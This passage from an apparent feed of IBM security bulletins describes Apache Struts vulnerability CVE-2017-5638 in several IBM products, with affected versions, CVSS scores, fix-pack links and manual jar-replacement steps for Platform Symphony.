Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP2_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP3_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP5_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:09:19", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-16T20:09:19", "id": "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "href": "https://www.ibm.com/support/pages/node/558281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T17:41:07", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and FlashSystem\u2122 900 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2. \n \nCode versions affected include supported VRMFs: \n\u00b7 1.4.0.0 \u2013 1.4.6.0 \n\u00b7 1.3.0.0 \u2013 1.3.0.7\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 &amp; \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 &amp; \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___ Fixed code VRMF .__ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_| _ __N/A_| [**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central_ _ \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-02-18T01:45:50", "id": "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "href": "https://www.ibm.com/support/pages/node/697155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:11", "description": "## Summary\n\nA Security vulnerability relating to remote code execution CVE-2017-5638 (S2-045) has been reported against Apache Struts 2, which IBM Platform Symphony uses as a framework for its WEBGUI service. The Struts 2 package version that is vulnerable to these issues is included in several past versions of IBM Platform Symphony Advanced Edition and Developer Edition. Struts 2.3.32 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)\n\n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \n\n**CVSS Base Score:** **7.3**\n\n**CVSS Temporal Score: See **[**_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \n\n**CVSS 3.0 Environmental Score*:** **Undefined**\n\n**CVSS Vector:** **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)**\n\n## Affected Products and Versions\n\nIBM Platform Symphony **6.1.1, 7.1 Fix Pack 1**, and** 7.1.1**,** **and** **IBM Spectrum Symphony** 7.1.2** and **7.2**. All OS editions, including Linux and Windows, are affected. The remediation steps for Linux are provided in this document. For Windows, use the Linux steps as a reference and find the correct path for patching.\n\n## Remediation/Fixes\n\n1\\. For IBM Platform Symphony 6.1.1 or 7.1 Fix Pack 1, download the appropriate fix and follow the instructions in the readme file to upgrade to Struts version 2.3.32. \n\n**Product version**| **Fix ID** \n---|--- \nIBM Platform Symphony **6.1.1**| [_sym-6.1.1-build446371_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build446371&includeSupersedes=0>) \nIBM Platform Symphony **7.1 Fix Pack 1**| [_sym-7.1-build446807_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build446807&includeSupersedes=0>) \n2\\. For IBM Platform Symphony 7.1.1 and higher, follow the steps to update to Struts version 2.3.32 on Linux hosts: 2.1 Log on to each management host in the cluster and download the struts-2.3.32-lib.zip package from the following location: [](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>)[_http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip_](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>) 2.2 Stop the Platform Management Console service (WEBGUI): &gt; egosh service stop WEBGUI 2.3 For backup purposes, move the following files, which will be replaced by new files: **\\- For IBM Platform Symphony 7.1.1:** \n&gt; mkdir -p /tmp/guibackup/symgui \n&gt; mkdir -p /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/gui/3.3/lib/commons-fileupload-1.3.1.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/3.3/lib/commons-io-1.2.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-fileupload-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/org.apache.commons-io-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-lang3-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/javassist-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-json-plugin-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-spring-plugin-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xstream-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n&gt; mkdir -p /tmp/guibackup/egogui \n&gt; mkdir -p /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-fileupload-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-io-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-lang3-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/org.apache.commons-io-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/freemarker-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/javassist-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/ognl-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-core-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-json-plugin-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-spring-plugin-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/xwork-core-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/xstream-*.jar /tmp/guibackup/egogui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/egogui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui \n&gt; mkdir -p /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) 2.4 On each management host, unzip the struts-2.3.32-lib.zip package and copy the following files to your cluster directory: **\\- For IBM Platform Symphony 7.1.1:** \n&gt; unzip -u struts-2.3.32-lib.zip \n&gt; cd struts-2.3.32/lib/ \n&gt; cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/3.3/lib/ \n&gt; cp commons-io-2.2.jar $EGO_TOP/gui/3.3/lib/ \n&gt; cp commons-lang3-3.2.jar $EGO_TOP/gui/3.3/lib/ \n&gt; cp commons-fileupload-1.3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp commons-io-2.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp commons-lang3-3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp javassist-3.11.0.GA.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp struts2-json-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n&gt; unzip -u struts-2.3.32-lib.zip \n&gt; cd struts-2.3.32/lib/ \n&gt; cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp commons-io-2.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp commons-lang3-3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp javassist-3.11.0.GA.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp struts2-json-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n&gt; cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n&gt; cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n&gt; cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n&gt; cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n&gt; cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) 2.5 Clean up the GUI work directories on all management hosts: &gt; rm -rf $EGO_TOP/gui/work/* \n&gt; rm -rf $EGO_TOP/gui/workarea/* \n**NOTE: **If you changed the default configuration for the WLP_OUTPUT_DIR environment variable and the APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR parameter is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/webgui_hostname/gui/workarea/ directory. 2.6 Launch a web browser and clear your browser\u2019s cache. \n2.7 Start the WEBGUI service: &gt; egosh service start WEBGUI\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:45", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:45", "id": "02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "href": "https://www.ibm.com/support/pages/node/631039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:34", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics version 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF19](<http://www.ibm.com/support/docview.wss?uid=swg24043514>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:50:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:50:04", "id": "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "href": "https://www.ibm.com/support/pages/node/558271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:08", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Products and Versions of FlashSystem V840\u2019s two node types \n** \n_Storage Node_ \n\u00b7 Machine Type Models (MTMs) affected include 9846-AE1 and 9848-AE1 \n\u00b7 Code versions affected include supported VRMFs: \no 1.4.0.0 \u2013 1.4.6.0 \no 1.3.0.0 \u2013 1.3.0.7 \n \n_Controller Node _ \n\u00b7 MTMs affected include 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1 \n\u00b7 Code versions affected include supported VRMFs: \no 7.8.0.0 \u2013 7.8.0.2 \no 7.7.0.0 \u2013 7.7.1.5\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 &amp; \n9848-AE1 \n \n**Controller nodes:** \n9846-AC0, \n9846-AC1, \n9848-AC0, &amp; \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Storage Node VRMF __ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_ \n \n__Controller Node VRMF __ \n_7.8 stream: 7.8.1.0_ \n_7.7 stream: 7.7.1.6_| _ __N/A_| [**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:32:46", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:32:46", "id": "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "href": "https://www.ibm.com/support/pages/node/697157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T09:36:02", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of Storwize V7000 Unified allowing 